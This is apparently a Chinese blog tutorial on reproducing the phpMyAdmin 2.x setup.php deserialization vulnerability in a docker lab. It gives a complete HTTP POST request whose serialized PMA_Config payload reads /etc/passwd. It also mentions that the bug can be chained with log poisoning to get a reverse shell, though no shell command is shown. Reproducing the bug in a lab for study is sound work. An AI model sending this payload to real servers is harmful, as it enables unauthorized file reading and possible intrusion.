四时宝库

程序员的知识宝库

学习phpMyAdmin scripts:setup.php 反序列化漏洞

phpMyadmin是一套开源的、基于Web的Mysql数据库管理工具。这个实验利用php的反序列化实现了任意文件读取,影响的版本是phpMyAdmin 2.x,然鹅,令人激动的是网上有师傅分享了利用该漏洞实现了反弹shell,思路是先访问出错,让access.log或者error.log记录出错信息,然后在利用反序列化读取access.log或者error.log文件中的代码,实现反弹shell,心动不如行动~

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

前提:准备好docker环境,下载好书籍配套实验环境,进入目录 ,开始复现漏洞

  • docker-compose build //可选
  • docker-compose up -d

完成试验后,记得删除漏洞环境哦~~

  • docker-compose down
  • docker system prune -a -f //可选

简单访问一下,说明phpMyAdmin scripts:setup.php 反序列化漏洞(WooYun-2016-199433)环境搭建成功了

掏出burpsuite准备发一个POST请求,获取etc目录下的passwd文件内容

POST /scripts/setup.php HTTP/1.1
Host: 144.34.162.13:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

由于这个实验中,无法记录请求,因此,就没有继续复现反弹shell了

发表评论:

控制面板
您好,欢迎到访网站!
  查看权限
网站分类
最新留言
    友情链接